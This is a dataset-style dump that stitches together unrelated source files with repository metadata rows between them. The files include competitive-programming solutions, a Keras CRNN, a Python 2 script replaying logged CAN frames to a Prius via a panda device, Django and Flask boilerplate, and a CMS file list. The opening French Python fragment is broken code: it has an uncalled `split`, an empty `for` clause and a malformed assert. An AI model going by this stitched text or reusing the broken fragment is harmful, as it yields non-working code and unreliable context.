# Entrée
départ = int(input())
nb_couples_stations = int(input())
assert 1 <= départ, nb_couples_stations <= 1000
liste_couples = map(int, input().split) for in range (nb_couples_stations)
# Sortie
print(nb_intermédiaires(liste, nb_couples)) | [
"franck.chambon@ac-aix-marseille.fr"
] | franck.chambon@ac-aix-marseille.fr |
9885653186d1619aaa626651335b51322f938b13 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02754/s775628525.py | c08aa17fa27593932f995ed4aa58535828193f96 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | if __name__ == '__main__':
n,a,b = map(int,input().split())
tmp1 = (n // (a + b)) * a
if tmp1 == 0:
tmp2 = min(n,a)
else:
tmp2 = n % (a + b)
tmp2 = min(a,tmp2)
print(tmp1+tmp2) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d73c2ea372d3745e6aed21a8328f59db0670ed9c | dad6951dd4e0696f9f9c54a815438806fa0b2798 | /recognition/network.py | 093c19a713cefd4bd595afe59ab3b9f58fde991e | [
"MIT"
] | permissive | Bobo-y/number_detection_recognition | 29a95ae9889e12469eeeecdcf337c2d375a6ccf1 | e135ab9a71d13fd3fa2d7946bc665b4c24b2e384 | refs/heads/master | 2023-04-14T01:32:26.804644 | 2023-04-07T07:27:39 | 2023-04-07T07:27:39 | 206,984,887 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,888 | py | from keras import backend as ktf
from keras.layers import Conv2D, LSTM, Lambda, BatchNormalization, MaxPooling2D, Reshape, Dense, Dropout, add, concatenate, Bidirectional
from keras.models import Model, Input
from keras.optimizers import SGD
class CRNN:
def __init__(self, width, height, label_len, characters):
self.height = height
self.width = width
self.label_len = label_len
self.characters = characters
self.label_classes = len(self.characters)
def ctc_loss(self, args):
iy_pred, ilabels, iinput_length, ilabel_length = args
# the 2 is critical here since the first couple outputs of the RNN
# tend to be garbage:
iy_pred = iy_pred[:, 2:, :] # no such influence
return ktf.ctc_batch_cost(ilabels, iy_pred, iinput_length, ilabel_length)
def network(self):
input_im = Input(shape=(self.width, self.height, 3))
conv_1 = Conv2D(64, (3, 3), activation='relu', padding='same')(input_im)
bn1 = BatchNormalization()(conv_1)
conv_2_1 = Conv2D(128, (3, 3), activation='relu', padding='same')(bn1)
conv_2_2 = Conv2D(256, (3, 3), activation='relu', padding='same')(conv_2_1)
bn2 = BatchNormalization()(conv_2_2)
pool_1 = MaxPooling2D(pool_size=(2, 2))(bn2)
conv_3_1 = Conv2D(256, (3, 3), activation='relu', padding='same')(pool_1)
conv_3_2 = Conv2D(512, (3, 3), activation='relu', padding='same')(conv_3_1)
bn3 = BatchNormalization()(conv_3_2)
pool_2 = MaxPooling2D(pool_size=(2, 2))(bn3)
conv_4_1 = Conv2D(512, (3, 3), activation='relu', padding='same')(pool_2)
conv_4_2 = Conv2D(512, (3, 3), activation='relu', padding='same')(conv_4_1)
bn4 = BatchNormalization()(conv_4_2)
bn_shape = bn4.get_shape()
x_reshape = Reshape(target_shape=(int(bn_shape[1]), int(bn_shape[2] * bn_shape[3])))(bn4)
fc_1 = Dense(128, activation='relu')(x_reshape)
rnn_1 = LSTM(128, kernel_initializer="he_normal", return_sequences=True)(fc_1)
rnn_1b = LSTM(128, kernel_initializer="he_normal", go_backwards=True, return_sequences=True)(fc_1)
rnn1_merged = add([rnn_1, rnn_1b])
# bi_lstm1 = Bidirectional(LSTM(128, kernel_initializer="he_normal", return_sequences=True), merge_mode='sum')(fc_1)
#
rnn_2 = LSTM(128, kernel_initializer="he_normal", return_sequences=True)(rnn1_merged)
rnn_2b = LSTM(128, kernel_initializer="he_normal", go_backwards=True, return_sequences=True)(rnn1_merged)
rnn2_merged = concatenate([rnn_2, rnn_2b])
# bi_lstm2 = Bidirectional(LSTM(128, kernel_initializer="he_normal", return_sequences=True), merge_mode='concat')(bi_lstm1)
drop_1 = Dropout(0.25)(rnn2_merged)
# drop_1 = Dropout(0.25)(bi_lstm2)
fc_2 = Dense(self.label_classes, kernel_initializer='he_normal', activation='softmax')(drop_1)
infer_model = Model(inputs=input_im, outputs=fc_2)
labels = Input(name='the_labels', shape=[self.label_len], dtype='float32')
input_length = Input(name='input_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
loss_out = Lambda(self.ctc_loss, output_shape=(1,), name='ctc')([fc_2, labels, input_length,
label_length])
train_model = Model(inputs=[input_im, labels, input_length, label_length], outputs=[loss_out])
sgd = SGD(lr=0.0001, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=5)
train_model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=sgd)
infer_model.summary()
train_model.summary()
return train_model, infer_model
if __name__ == '__main__':
import string
CRNN(200, 31, 11, '0123456789'+'-').network()
| [
"yl305237731@gmail.com"
] | yl305237731@gmail.com |
33b4d90c4efa471773177d7d5852f84c30010563 | 2c84413f27983ef4a70d8bacb8f75347e29279b5 | /common/simulation.py | 3a801b78ce96a59a8519d1d24eb09c90c8f2948a | [] | no_license | KUASWoodyLIN/SmartCar | 0ff2fe94d871fbcc028f0e7bce975ad00115e9bf | 06f429f3980d4abea6fb4fb7e77f2a7b371a8206 | refs/heads/master | 2020-03-18T10:21:40.208636 | 2018-05-29T18:22:09 | 2018-05-29T18:22:09 | 134,608,273 | 1 | 1 | null | 2018-05-28T03:59:46 | 2018-05-23T18:08:23 | Python | UTF-8 | Python | false | false | 1,827 | py | import os
import struct
import time
from pandas.io.parsers import read_csv
from canbus import Prius
ROOT_PATH = os.path.expanduser('~')
DATA_PATH = os.path.join(ROOT_PATH, 'picture/car_logger')
canfile2 = os.path.join(DATA_PATH, 'canbus_output2.csv')
output = os.path.join(DATA_PATH, "combine2file.csv")
class Prius_sim(Prius):
def __init__(self):
super(Prius_sim, self).__init__()
def send_data(self, can_send):
self.panda.can_send_many(can_send)
def main():
sim = Prius_sim()
df = read_csv(canfile2)
can_data = df.values
sys_start_time = time.time()
can_start_time = can_data[0][0]
can_pre_time = can_data[0][0]
first_time = True
for data in can_data:
can_now_time = data[0]
addr = int(data[2], 16)
msg = data[3].split('x')[-1]
msg = [struct.pack('B', int(msg[i:i + 2], 16)) for i in xrange(0, len(msg), 2)]
msg = "".join(msg)
sim.send_data([[addr, 0, msg, 0]])
# print "can {}".format(can_now_time - can_pre_time)
# print "sys {}".format((time.time() - sys_pre_time))
# print can_now_time - can_pre_time - (time.time() - sys_pre_time)
if first_time:
time.sleep(can_now_time - can_pre_time)
first_time = False
else:
can_time = can_now_time - can_pre_time
delay_time = can_time - time.time() + sys_pre_time
if delay_time > 0:
time.sleep(delay_time)
else:
can_now_time = can_now_time - delay_time + 15.100e-05
sys_pre_time = time.time()
can_pre_time = can_now_time
print "System running time\t{}".format(time.time()-sys_start_time)
print "CAN messing running time\t{}".format(can_now_time-can_start_time)
if __name__ == '__main__':
main() | [
"jj7158761@gmail.com"
] | jj7158761@gmail.com |
dec0b68ae796dfec7127aa46ccb149a4eb6b64b6 | aca5fb05db7b7199456ecaecf402990925afd61b | /takenote/manage.py | 2173da3f84949a5de4eaa6224da1dfdfb62b2b42 | [
"Apache-2.0"
] | permissive | macerocket/takenote | c9573943353f76e569661197c845787a5a5276a2 | df02c41e44a9c2f4a0505d1de0ed732a59dda173 | refs/heads/main | 2023-06-19T15:28:42.617999 | 2021-07-20T12:54:56 | 2021-07-20T12:54:56 | 386,726,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'takenote.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"macerocket@yahoo.com"
] | macerocket@yahoo.com |
24a6b0edca4aea76ed2df92a4506e69f18716c16 | 05e102fb6c9232db2fb8ce5712b87b6552c4d32b | /src/mcp/main/routes.py | ecd9940615e974ce0c4c748644e29d2029d5efc7 | [] | no_license | iceph03nix/MCP-Server | a06c51779aa23b789d4c72abcc286e8463d810cf | c835a371b9abba3f9da92a696131e18f86c7eb8a | refs/heads/master | 2023-02-18T12:31:58.165193 | 2021-01-15T05:14:28 | 2021-01-15T05:14:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | from flask import render_template, request, redirect, url_for, Blueprint
from flask_user import login_required, roles_required
main = Blueprint('main', __name__, template_folder='templates')
@main.route("/")
@main.route("/home")
def home():
return render_template('home.html', title='Home')
@main.route("/about")
def about():
return render_template('about.html', title='About')
@main.route("/admin")
@login_required
@roles_required('admin')
def admin_dashboard():
return render_template('admin_dashboard.html', title="Admin Dashboard")
| [
"iceman81292@gmail.com"
] | iceman81292@gmail.com |
94607147cb6a428256583d99cca352c265328f80 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02595/s086135640.py | 10579db5c1e5ef2a5300d80b183a84bc3668641d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | n,d = map(int,input().split())
cnt = 0
md = d**2
for _ in range(n):
a,b = map(int,input().split())
if md >= (a**2+b**2):
cnt += 1
print(cnt)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
33a55487e1f510c987844e49089fa57129182715 | 2fc8d3f1905fc02c474a877bd3144d609715ca85 | /genvslist.py | 6494946bb9b30bf2b76d9b3466861392b1f3d7da | [] | no_license | pandeymanish0786/python | 76e2426dced42b80a770af36436728cf08006846 | 169daf90f1088eb52ad499b54ee7ded3b6d86c70 | refs/heads/master | 2020-03-30T05:20:28.646150 | 2018-09-28T21:00:33 | 2018-09-28T21:00:33 | 150,793,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import sys
list_comp=sys.getsizeof([x*10 for x in range(1000)])
gen_exp=sys.getsizeof([x*10 for x in range(1000)])
print("to do the same thing,it takes.... ")
print(f"list comprehension {list_comp} bytes")
print(f"generator_expression {gen_exp} bytes")
| [
"noreply@github.com"
] | pandeymanish0786.noreply@github.com |
53071b95353ce7f83146f46c794afe3f096b1c04 | 0c24fcbf802ed1881abdfbf14b867d4545237602 | /students/y2331/practical_works/Levashova_Nastya/lesson_11022020/manage.py | d3c09516236e700cf375a68a1c77f5c803017ed2 | [] | no_license | TonikX/ITMO_FSPO_Web_Django_2020 | d435d2984778d668f6d04c86d78c991b3f390c1a | 267141d6e4ee231ca689c8929f3db25fef15a5fd | refs/heads/master | 2023-01-18T17:38:05.964240 | 2020-11-20T18:08:57 | 2020-11-20T18:08:57 | 245,081,715 | 2 | 139 | null | 2023-04-25T18:54:50 | 2020-03-05T05:59:54 | Python | UTF-8 | Python | false | false | 635 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'lesson_11022020.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"62665598+tommmatojuice@users.noreply.github.com"
] | 62665598+tommmatojuice@users.noreply.github.com |
750932c0feb10216e230c989379fd3b764a5f998 | 477a636abfcd7e097fbf3dfe23626fe01693f1d5 | /dist/bin/unidoc-utf16 | 6325dd3bf6571665fe074f9f3c99c1fe472ba1f8 | [
"MIT"
] | permissive | shinkou/unicnv | 61e1c232ff3221b80f8e07b2372c6146b4e018d1 | befe476245e2587e352298834c5b9c0749ae188b | refs/heads/master | 2022-04-13T22:46:03.880250 | 2020-04-10T04:29:35 | 2020-04-10T04:29:35 | 254,544,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | #!/usr/bin/env python
# vim: fenc=utf-8 ff=unix ft=python lcs=tab\:>. list noet sw=4 ts=4 tw=0
from unicnv.unidoc_utf16 import main
if '__main__' == __name__:
main()
| [
"chunkwong.wong@gmail.com"
] | chunkwong.wong@gmail.com | |
183f7b8c55dcea8984a0f890ca6d83b8360ce420 | 993ef8924418866f932396a58e3ad0c2a940ddd3 | /Production/python/Summer20UL17/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8_cff.py | 19be89904fdebd86931dd97d867f4863815778f5 | [] | no_license | TreeMaker/TreeMaker | 48d81f6c95a17828dbb599d29c15137cd6ef009a | 15dd7fe9e9e6f97d9e52614c900c27d200a6c45f | refs/heads/Run2_UL | 2023-07-07T15:04:56.672709 | 2023-07-03T16:43:17 | 2023-07-03T16:43:17 | 29,192,343 | 16 | 92 | null | 2023-07-03T16:43:28 | 2015-01-13T13:59:30 | Python | UTF-8 | Python | false | false | 27,922 | py | import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/0130ADED-8944-C644-A802-94AFC869D180.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/02A675E2-0B98-1E47-BEF2-87AE267B3872.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/05947A84-468D-0A4B-824F-F909985C25A2.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/0EB832E6-CFDA-1F4F-831E-80EF025519F4.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/0F0728C6-805B-FE44-B8FA-8B6187AFEF8E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/0F3CD983-9A34-484F-933F-3C21DC6C9E9D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1021FA02-DD5C-FE4A-9829-79C55F702D5B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1050621F-A8FA-9E4E-8EB3-5F00EE52E5E1.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1145C4B6-FBEE-AE44-A882-B83E9F95EECF.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/131DFA05-56CF-2941-8003-661F79235C14.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1334FCA4-B8BC-8947-AA50-C254B3A4CE5C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/13CC0632-BB4F-8243-9A01-49F8EF020833.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/16E97FF6-09B6-AD4E-97BE-5B0FA146C3C0.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/172A350A-7746-374B-95F7-6504F93336E6.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1D6AC295-4F43-F14C-B55D-86F6FC83B962.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1D891B47-4DA9-1C46-B491-82044BD05D26.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1F10683A-0032-1044-8E8C-3892254F215A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/20C72032-4DC2-0B4E-AFFA-8F12A44E3060.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/290937DC-867D-3143-A8A4-917F6D31E53B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/2EB5DE9B-B61C-8F4B-B295-B0F235019434.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/31C75064-B139-4E4F-B592-732566F66DAA.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/33FA51CA-1F64-104D-B5DD-AEBF47F612F3.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/34E98EFE-AA61-8142-9152-247888299ED0.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/35DA2631-3BB1-FC4E-8A2A-AE7B2E4E5476.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/37425CC5-CBE9-464E-96E9-5C06D4F7CA44.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/38BAC4EF-B549-124E-ADE1-BBF142C9C1B2.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/3DAF4FC3-9097-0542-9A41-19B6C85EC65C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/3E833A9C-A5D7-044C-82CE-7835A22FAD5F.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/3F6BF9EE-2AB9-B748-B54B-DD1A016D89DD.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/45F68B41-93BC-7040-9CB0-D39E52AC2144.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4A717FB3-FB8C-7349-A536-8B2D43A5CEC9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4B14CF1A-A022-3643-9FDB-20EE9FC6EED9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4B6744E7-2A4F-624E-B577-9B59FA360FA9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4B692BBD-CAB4-314F-93DF-F3B656F8129A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4BA885FD-17E1-D54A-9D02-655EAD670F28.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/54739C76-024C-8F4C-9F2F-4CD073BE5896.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/56AA3A5D-6B5C-D54C-8B70-24A99BD4C0D8.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/57918A90-9481-8D47-B47D-DE329B3D5889.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/57D0B089-45FA-5840-9826-5C500B55C896.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/57DE6F33-6427-0F4A-BB04-41ACEBB2170B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/5A73A109-2336-A54C-8C92-AC4FE5C46949.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/5B887B67-FEE6-3347-A798-779B15B1B03E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/5BDC6A67-F02D-AA4B-827A-2080F4804209.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/64131FFA-2DC6-C247-B8BA-5EB3285B660A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/662A4882-EDD2-0A49-96F5-DF010A222784.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/66402955-6310-7944-A363-2ACFD06BB460.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/66FDCBF5-79B2-284F-BB67-AD47A7FDC86B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/68B17790-E335-C746-9E29-C8A3497FBC02.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/68DD74DB-F918-624A-99FA-9C651991F84B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/6A5535C4-5F5B-164B-B616-48487984C880.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/6A7E4CEB-260F-8B4B-9393-8B9467E7E60D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/6BAE3043-3D74-E641-B6D7-3A6248297045.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/6E59C4F4-4388-EA43-8337-DD7A7F421AAD.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/749AB99A-5BBF-1F45-8D69-4524E98187C6.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/74F9CCA6-49D7-464A-A276-323339BCCD0E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/75FB00E3-AC8A-4B4D-B234-07AE0193BB6E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/78E2CB0E-556C-3B48-B210-CEDBA0647D61.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/79646C05-8327-3948-8387-B747CBCF674D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7AE660E0-C428-AA46-B65B-23CFB6F6F172.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7BC9D945-CC67-1747-8684-87430F96675C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7CBF2F34-2FB5-6042-8F9C-AF9B739F5F68.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7E39A5FB-303A-CE44-878D-5FD31CCAF56E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7E3E7A04-2518-8049-8306-2E47440BE03B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7EE3170D-7EB6-D24A-A66F-8D17AEA997BB.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7F47D1B5-0EB4-0B44-8C03-C3CCF057CB0E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7F774269-4E11-454C-B65C-5E19F27CEEF6.root',
